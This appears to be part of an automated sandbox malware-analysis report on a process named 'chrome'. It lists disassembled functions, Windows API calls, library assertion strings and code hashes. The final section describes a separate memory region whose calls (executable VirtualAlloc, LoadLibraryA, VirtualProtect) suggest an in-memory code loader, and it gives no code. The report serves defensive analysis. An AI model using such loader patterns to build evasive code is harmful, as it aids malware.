                                                      • Part of subcall function 00E52190: CloseHandle.KERNEL32(FFFFFFFE,00E5214E,?,00E4C366,00000000,00000001,?,?,?,00E3DAE9,?,00000000,00000000,?,?), ref: 00E521A0
                                                    • ___initconout.LIBCMT ref: 00E5214E
                                                      • Part of subcall function 00E52170: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E5210C,00E4C353,?,?,00E3DAE9,?,00000000,00000000,?), ref: 00E52183
                                                    • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00E4C366,00000000,00000001,?,?,?,00E3DAE9,?,00000000,00000000,?), ref: 00E52163
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: 9e5d20b4ed327a82210ac476a608c6fa0e8f54cbee062638be9737bcd97198ab
                                                    • Instruction ID: 8c3bfbe45eaa3e6d06d624cdbf79ec1508e0f70d753f9264bc6c3176cc9a2292
                                                    • Opcode Fuzzy Hash: 9e5d20b4ed327a82210ac476a608c6fa0e8f54cbee062638be9737bcd97198ab
                                                    • Instruction Fuzzy Hash: 0AF01C36401558BFCF221FE2DD48A8F3F66EB493A1B098528FF09B9120C63299649B91
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(85088B40,ECFE467E,?,?,?,?,00DBEE3A,?), ref: 00DBF540
                                                    • ReleaseSRWLockExclusive.KERNEL32(00000001,00000001,?,00DBEE3A,?), ref: 00DBF5A8
                                                      • Part of subcall function 00DBAE00: ReleaseSRWLockExclusive.KERNEL32(00000001,00000001), ref: 00DBAF04
                                                      • Part of subcall function 00DBAE00: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DBAF67
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ScopedBlockingCall
                                                    • API String ID: 17069307-1243657212
                                                    • Opcode ID: 72c63b946fe23011ac835beada05703f5fa98cd4fbd0bcba86fc4a616587273c
                                                    • Instruction ID: 75abbb4730f839250014546d7b7598079d660019fb9fdd014ea72dbeafcfd77c
                                                    • Opcode Fuzzy Hash: 72c63b946fe23011ac835beada05703f5fa98cd4fbd0bcba86fc4a616587273c
                                                    • Instruction Fuzzy Hash: D4A10271600201CFDB28CF69C884BB6BBF5FF45314F1885B9E85A8B696D734E855CBA0
                                                    APIs
                                                    • GetCurrentThread.KERNEL32 ref: 00D38BF9
                                                    • QueryThreadCycleTime.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D38C0C
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string:2502: assertion __n == 0 || __s != nullptr failed: string::assign received nullptr, xrefs: 00D38BC2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Thread$CurrentCycleQueryTime
                                                    • String ID: ..\..\third_party\libc++\src\include\string:2502: assertion __n == 0 || __s != nullptr failed: string::assign received nullptr
                                                    • API String ID: 2290024384-1286669872
                                                    • Opcode ID: 608cfd111b9545e4b3e0768cbd72e51638f7ab36b1428e33904cdfcc6970ecf8
                                                    • Instruction ID: 613f24b53922f8a22bfb9fc44eca258d253e0dff88fe5d08ebae7fe7ba4bdd84
                                                    • Opcode Fuzzy Hash: 608cfd111b9545e4b3e0768cbd72e51638f7ab36b1428e33904cdfcc6970ecf8
                                                    • Instruction Fuzzy Hash: 5571B2B1A007169FCB11CF68C88146FBBF5EF94350F18852EF896A7251EB70A905DBA0
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr, xrefs: 00D3E90E
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D3E915
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap$..\..\third_party\libc++\src\include\string:973: assertion __s != nullptr failed: basic_string(const char*) detected nullptr
                                                    • API String ID: 4218353326-1580066018
                                                    • Opcode ID: b07c93ec3eac9fe2d8fa6a59ed4e99e40d17170e95ddddd44f8410f4e59284ca
                                                    • Instruction ID: d0dc6139ba5784a4b6ddfb861ae66d0ed4d0d7cb6b7dae5535d177ccbaed36df
                                                    • Opcode Fuzzy Hash: b07c93ec3eac9fe2d8fa6a59ed4e99e40d17170e95ddddd44f8410f4e59284ca
                                                    • Instruction Fuzzy Hash: EE715F71E002199FCB14DF68E884AAEB7F5FF88304F198169E819AB395D7309D05CFA5
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E5784A
                                                      • Part of subcall function 00D74B90: GetFileVersionInfoSizeW.VERSION(?,00000000,0.0.0.0-devel,0000000D,Chrome,00000006,?,00E578B9,?), ref: 00D74BF2
                                                      • Part of subcall function 00D74B90: GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,00000006,?,00E578B9,?), ref: 00D74C1B
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E57A2F
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E57A36
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: File$InfoVersion$ModuleNameSize
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 4070046241-2500828650
                                                    • Opcode ID: f7200ff848bd44ce997f06ab34c86f5101a02510df91d9a0d8857622687bfdf8
                                                    • Instruction ID: 7ba1f98bfc9c75dcd250666dd09371dc89baa49e3a1ef9b41c674bcd57476488
                                                    • Opcode Fuzzy Hash: f7200ff848bd44ce997f06ab34c86f5101a02510df91d9a0d8857622687bfdf8
                                                    • Instruction Fuzzy Hash: EE51E1B1D012296BCF24DF60EC89BDEB7B4AF44305F0485E8E84976101E775AFA8CE90
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF5A90
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF5A9F
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00DF5A81
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: CurrentThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 2882836952-2888085009
                                                    • Opcode ID: e971853543aac9fcfdd1b58747466db9ec4b16bc8d80769205037b46f2974579
                                                    • Instruction ID: f0b86d7166ddbc3e13a86c7ced949d98a8ab207c70a400e9e71f6207ef61158f
                                                    • Opcode Fuzzy Hash: e971853543aac9fcfdd1b58747466db9ec4b16bc8d80769205037b46f2974579
                                                    • Instruction Fuzzy Hash: D841B4316006199FCB14CF18E8809BAB7B1FF48314B1AC669FE599B355D730EC11CBA0
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EF44BC,?,00000000,?,00DB7842,?,?,?,?,7FFFFFF7,?), ref: 00D34CFB
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF44BC,..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap,?,?,?,?,00DB7842,?,?,?,?,7FFFFFF7,?), ref: 00D34D77
                                                      • Part of subcall function 00E282C8: AcquireSRWLockExclusive.KERNEL32(00EF2800,000000C0,?,?,00DBFE69,00F02A10), ref: 00E282D3
                                                      • Part of subcall function 00E282C8: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00DBFE69,00F02A10), ref: 00E2830D
                                                      • Part of subcall function 00E28317: AcquireSRWLockExclusive.KERNEL32(00EF2800,?,?,00E57C0E,00EF3538,?,?,00E57B98), ref: 00E28321
                                                      • Part of subcall function 00E28317: ReleaseSRWLockExclusive.KERNEL32(00EF2800,?,00E57C0E,00EF3538,?,?,00E57B98), ref: 00E28354
                                                      • Part of subcall function 00E28317: WakeAllConditionVariable.KERNEL32(00EF27FC,?,00E57C0E,00EF3538,?,?,00E57B98), ref: 00E2835F
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap, xrefs: 00D34DCF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake
                                                    • String ID: ..\..\third_party\libc++\src\include\__string\char_traits.h:145: assertion !std::__is_pointer_in_range(__s1, __s1 + __n, __s2) failed: char_traits::copy: source and destination ranges overlap
                                                    • API String ID: 4258034872-2510419621
                                                    • Opcode ID: ebedbff881ab21b71dc1d19ae7fe5131735304a383b03079674aed8a7afe7cee
                                                    • Instruction ID: d7a8720f386f41959671ceb0fec7005e0df2472cbf85a9a5063a1a2409b03e66
                                                    • Opcode Fuzzy Hash: ebedbff881ab21b71dc1d19ae7fe5131735304a383b03079674aed8a7afe7cee
                                                    • Instruction Fuzzy Hash: 5741E3B1A002549FCB10DFA4F982BAF77E1EB84314F195129E915BB2C1C739BD08CBA1
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ... (message truncated)$[%s : %d] RAW:
                                                    • API String ID: 4218353326-3262997248
                                                    • Opcode ID: 1b3170b34e72ca7281b413a11f27d34933c0ead851827daeae2a80327293b093
                                                    • Instruction ID: cda5b7a7874d284f66d1739a3cfa443ee519a2689038e77bdfb48ca67bdd2210
                                                    • Opcode Fuzzy Hash: 1b3170b34e72ca7281b413a11f27d34933c0ead851827daeae2a80327293b093
                                                    • Instruction Fuzzy Hash: EF31FCB6D01229ABDB109E50EC46EDA7BB9EF94308F0044A9FD09B7181EB315E55CBA0
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E89AA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: FileModuleName
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\misc\paths_win.cc$GetModuleFileName
                                                    • API String ID: 514040917-708485756
                                                    • Opcode ID: ad596e0d4bd0d0a9fa4a7abd782c97bbc4ffa64e968af4445245907df66f1deb
                                                    • Instruction ID: 3fab9b06fca4a7358735c2c1d204e3bc5dab7fd55930fe5f6b9b64e677d9c245
                                                    • Opcode Fuzzy Hash: ad596e0d4bd0d0a9fa4a7abd782c97bbc4ffa64e968af4445245907df66f1deb
                                                    • Instruction Fuzzy Hash: C721C9B1B4031826DA10BA616C8BFBF379D9B44704F042464FA0D7A2C3DEA45D4896A2
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00F03488), ref: 00D34E14
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D34E8D
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\array:239: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>, xrefs: 00D34EC4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ..\..\third_party\libc++\src\include\array:239: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>
                                                    • API String ID: 17069307-1005156258
                                                    • Opcode ID: c1fb519a1cf126b6365fffa9acebcccc4cabb5e5a05e4382b386ec22256c929d
                                                    • Instruction ID: 29b24242e83a940b0dd287e6ee62a46df132e1ea582c46049df53eb1ac9af914
                                                    • Opcode Fuzzy Hash: c1fb519a1cf126b6365fffa9acebcccc4cabb5e5a05e4382b386ec22256c929d
                                                    • Instruction Fuzzy Hash: 6E31A230A0018ADFDB10CF24C894AEABBF5FF49318F188555F454AB341D73AE956CBA0
                                                    APIs
                                                    • WriteFile.KERNEL32(00000024,?,7FFFFFFF,?,00000000), ref: 00D7483D
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io.cc, xrefs: 00D748B2
                                                    • WriteFile, xrefs: 00D748C4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io.cc$WriteFile
                                                    • API String ID: 3934441357-1292784012
                                                    • Opcode ID: 18ec4dc449cb8f1e12480a082ba9beadbff72ff58a73229ceec3797e385bc0d4
                                                    • Instruction ID: 82ce3cf4db6f855ef2c527cc9712f326aeb9a0ce6761016270e42396e386a9d4
                                                    • Opcode Fuzzy Hash: 18ec4dc449cb8f1e12480a082ba9beadbff72ff58a73229ceec3797e385bc0d4
                                                    • Instruction Fuzzy Hash: 5421DA317003589BDB289A299C55B7B77AAABC4760F148369F92DB72C0DF30DD05C562
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D78770
                                                    • SetFilePointerEx, xrefs: 00D78780
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: FilePointer
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$SetFilePointerEx
                                                    • API String ID: 973152223-3423003897
                                                    • Opcode ID: 0d4e88912ce1f554ac080d2c72d8c4fb727916dea3e63d14dcdcfdbe040b3d36
                                                    • Instruction ID: 57c41fa2a191ee8a3460833d81b7062da8c6daf06e6609b6ac63b74c21f62bfb
                                                    • Opcode Fuzzy Hash: 0d4e88912ce1f554ac080d2c72d8c4fb727916dea3e63d14dcdcfdbe040b3d36
                                                    • Instruction Fuzzy Hash: A121FF756043949FC724DF29980675BB7E9EFC9720F14C92EE88DA7381EB709804CB92
                                                    APIs
                                                    Strings
                                                    • bad_array_new_length was thrown in -fno-exceptions mode, xrefs: 00E57A73
                                                    • length_error was thrown in -fno-exceptions mode with message "%s", xrefs: 00E57A66
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: bad_array_new_length was thrown in -fno-exceptions mode$length_error was thrown in -fno-exceptions mode with message "%s"
                                                    • API String ID: 4218353326-980162239
                                                    • Opcode ID: d9870fc2459a3b5e3de15fc549c63d9af4a9e5504724e55cca196641a6232219
                                                    • Instruction ID: cb50ad933255ac165d6c41c08d92b5b9b89cb131410895bb57668916e8359e39
                                                    • Opcode Fuzzy Hash: d9870fc2459a3b5e3de15fc549c63d9af4a9e5504724e55cca196641a6232219
                                                    • Instruction Fuzzy Hash: 7401C4E5D0430C37DA2076B17C06F9B3B9D9B41724F402924FE5936683EA71A95881F2
                                                    APIs
                                                    • UnlockFileEx.KERNEL32(?,00000000,-00000001,-00000001,00000002), ref: 00D755D0
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D75616
                                                    • UnlockFileEx, xrefs: 00D75628
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FileUnlock
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$UnlockFileEx
                                                    • API String ID: 45017762-3540829929
                                                    • Opcode ID: 6d6c7b64d948a055bc798d746128f703c71e873d9be7276f9a34bccf618bc0dd
                                                    • Instruction ID: 0cd67b5c0c3bfdae793d34a8d48dad4931134be4fbbe4ea913330fed2f8a5e0d
                                                    • Opcode Fuzzy Hash: 6d6c7b64d948a055bc798d746128f703c71e873d9be7276f9a34bccf618bc0dd
                                                    • Instruction Fuzzy Hash: C7010871A003195BD7289F659C46EBF77AEEF84350F44816AF8097B2C1EB705D88C6A1
                                                    APIs
                                                      • Part of subcall function 00D42A10: UnmapViewOfFile.KERNEL32(?,00000000,?,?,00000001,?,00D325CE,?,?,?,?,?,?,?,?,00D324EF), ref: 00D42A22
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000000,?,00D4294A,?,?), ref: 00D429CD
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D429D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressFileHandleModuleProcUnmapView
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 3224599007-1090674830
                                                    • Opcode ID: 809b134b8d37f4d81cfa4500a20c552b5998b77397eb55c5e0d4091c35023b47
                                                    • Instruction ID: e941a8ab56a1d1e82018af37dbe4ffe474d7d05c5abd506b228dd2a8b73fe11b
                                                    • Opcode Fuzzy Hash: 809b134b8d37f4d81cfa4500a20c552b5998b77397eb55c5e0d4091c35023b47
                                                    • Instruction Fuzzy Hash: 3901D6712403409FDB206B26EC89B7B77E9FB49710F580825F543EB3A1DA70E804CAB1
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D3D34F
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D3D35B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1646373207-1090674830
                                                    • Opcode ID: 92f0f291b706efccd55c7540618a692435e74bb68b537563b457f9d0e864f39b
                                                    • Instruction ID: a9006453584e1b1289e49375b38ab4825b377a99a6c5c3230639ac4489cad9fe
                                                    • Opcode Fuzzy Hash: 92f0f291b706efccd55c7540618a692435e74bb68b537563b457f9d0e864f39b
                                                    • Instruction Fuzzy Hash: 3D0175B1600345EFD7106B66FC49B3A77AAFB89311F580425F142E73A1DA75AC48CA72
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 0-1090674830
                                                    • Opcode ID: 97acb8e96ab0c3297c796867db6c92cb56f714f2ef8963c5b629064befe5442b
                                                    • Instruction ID: 42835abe6ce047df57e3d9968828740e80bee6044e9fe189341500e300625afb
                                                    • Opcode Fuzzy Hash: 97acb8e96ab0c3297c796867db6c92cb56f714f2ef8963c5b629064befe5442b
                                                    • Instruction Fuzzy Hash: 7501D8B1600340AFDB106B26EC49BAA77A9FF85315F544429F106FB3B1EA71AC88C761
                                                    APIs
                                                      • Part of subcall function 00D786B0: SetFilePointerEx.KERNEL32 ref: 00D78724
                                                    • SetEndOfFile.KERNEL32(?), ref: 00D75E1B
                                                    Strings
                                                    • SetEndOfFile, xrefs: 00D75E6D
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D75E5B
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: File$Pointer
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$SetEndOfFile
                                                    • API String ID: 1339342385-359779137
                                                    • Opcode ID: e9c64d58914dd472fe63f5dd524510adf5c007a0c3b9ef75216249ce581befb9
                                                    • Instruction ID: 50b76aaa1fad43da00cf1cf4bb5e039cd985810c8ab7e632195cdebcca5676de
                                                    • Opcode Fuzzy Hash: e9c64d58914dd472fe63f5dd524510adf5c007a0c3b9ef75216249ce581befb9
                                                    • Instruction Fuzzy Hash: EA01D875B007186EEB20AA656D47E7B779CDF45344F048075F90C77282FAB45E088672
                                                    APIs
                                                    • VirtualQuery.KERNEL32(80000000,00E29356,0000001C,00E2930B,00000000,?,?,?,?,?,?,?,00E29356,00000004,00EF2840,00E293A2), ref: 00E2925D
                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00E29356,00000004,00EF2840,00E293A2), ref: 00E29278
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: InfoQuerySystemVirtual
                                                    • String ID: D
                                                    • API String ID: 401686933-2746444292
                                                    • Opcode ID: e7a4d799c2d4ebbb9bd9e52b934743a503e7e1cd42d6edaa5970b71391b6ccb7
                                                    • Instruction ID: 2bf14f25bad367c9004b279af41980621baf5793fd1a8e3a30cab6c35faeb80c
                                                    • Opcode Fuzzy Hash: e7a4d799c2d4ebbb9bd9e52b934743a503e7e1cd42d6edaa5970b71391b6ccb7
                                                    • Instruction Fuzzy Hash: 51018473600119ABDF14DE29EC05BEE7BAEAFC4328F0CD124ED59EB255D634E9058690
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000000,00000000,?,00D3297D,?), ref: 00E10940
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00E1094C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1646373207-1090674830
                                                    • Opcode ID: 1ee187ec4abc85166856a8c53ec5bbf48743ccc0393ea5b6cce600366f69ee97
                                                    • Instruction ID: 4aeea1b7eac01c9e2275b3a82c4ef2c471546f40b340d2b9245d802ca225fa6b
                                                    • Opcode Fuzzy Hash: 1ee187ec4abc85166856a8c53ec5bbf48743ccc0393ea5b6cce600366f69ee97
                                                    • Instruction Fuzzy Hash: 12F0C831340344AFE6102B66EC5DBBA379DE7C8705F040024F206FB3A2DAA46CC8CA71
                                                    APIs
                                                      • Part of subcall function 00E54170: _strlen.LIBCMT ref: 00E5426C
                                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 00E58480
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ___std_exception_destroy_strlen
                                                    • String ID: Bad variant access$bad_variant_access.cc
                                                    • API String ID: 907491995-4004146108
                                                    • Opcode ID: fa3ef2892bc4d796a97bb0e6898e4d0905f9c0157f0d7350d640e2c6beda2498
                                                    • Instruction ID: 38b5b3110037dfb4672ea9e7ffc1fd7a181a8a90fd88d1f1774de6f7207e3f47
                                                    • Opcode Fuzzy Hash: fa3ef2892bc4d796a97bb0e6898e4d0905f9c0157f0d7350d640e2c6beda2498
                                                    • Instruction Fuzzy Hash: 51E0D8F294131873E6117999BC07E977A8CCB21705F045836FF087A382E6E3AA5582E6
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D848FE
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D8490A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1646373207-1090674830
                                                    • Opcode ID: 0066f259109dd57b8db74156e9e14b0259d115f62220eac788f96f09b4c63a89
                                                    • Instruction ID: 031dc80a3100015c7458918424adbe2fa6d317e5f16fc3893e6bb6d88ba8180c
                                                    • Opcode Fuzzy Hash: 0066f259109dd57b8db74156e9e14b0259d115f62220eac788f96f09b4c63a89
                                                    • Instruction Fuzzy Hash: D8D01770604306BFDE107B72AE59B27379C9755B01F081428F106E6260DA68E808CA72

                                                    Execution Graph

                                                    Execution Coverage:41.7%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:6
                                                    Total number of Limit Nodes:0
                                                    execution_graph 86 4ff0000 VirtualAlloc 87 4ff003e 86->87 88 4ff00d4 LoadLibraryA 87->88 90 4ff014a 87->90 88->87 89 4ff01fe KiUserExceptionDispatcher 90->89 91 4ff01e7 VirtualProtect 90->91 91->89 91->90

                                                    Callgraph

                                                    Control-flow Graph

                                                    APIs
                                                    • VirtualAlloc.KERNELBASE(?,?,00003000,00000040), ref: 04FF0035
                                                    • LoadLibraryA.KERNELBASE(00000000), ref: 04FF00E0
                                                    • VirtualProtect.KERNELBASE(?,?,00000000,?), ref: 04FF01F5
                                                    • KiUserExceptionDispatcher.NTDLL(00000000,00000001,00000000), ref: 04FF0215
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1775476039.0000000004FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04FF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_4ff0000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Virtual$AllocDispatcherExceptionLibraryLoadProtectUser
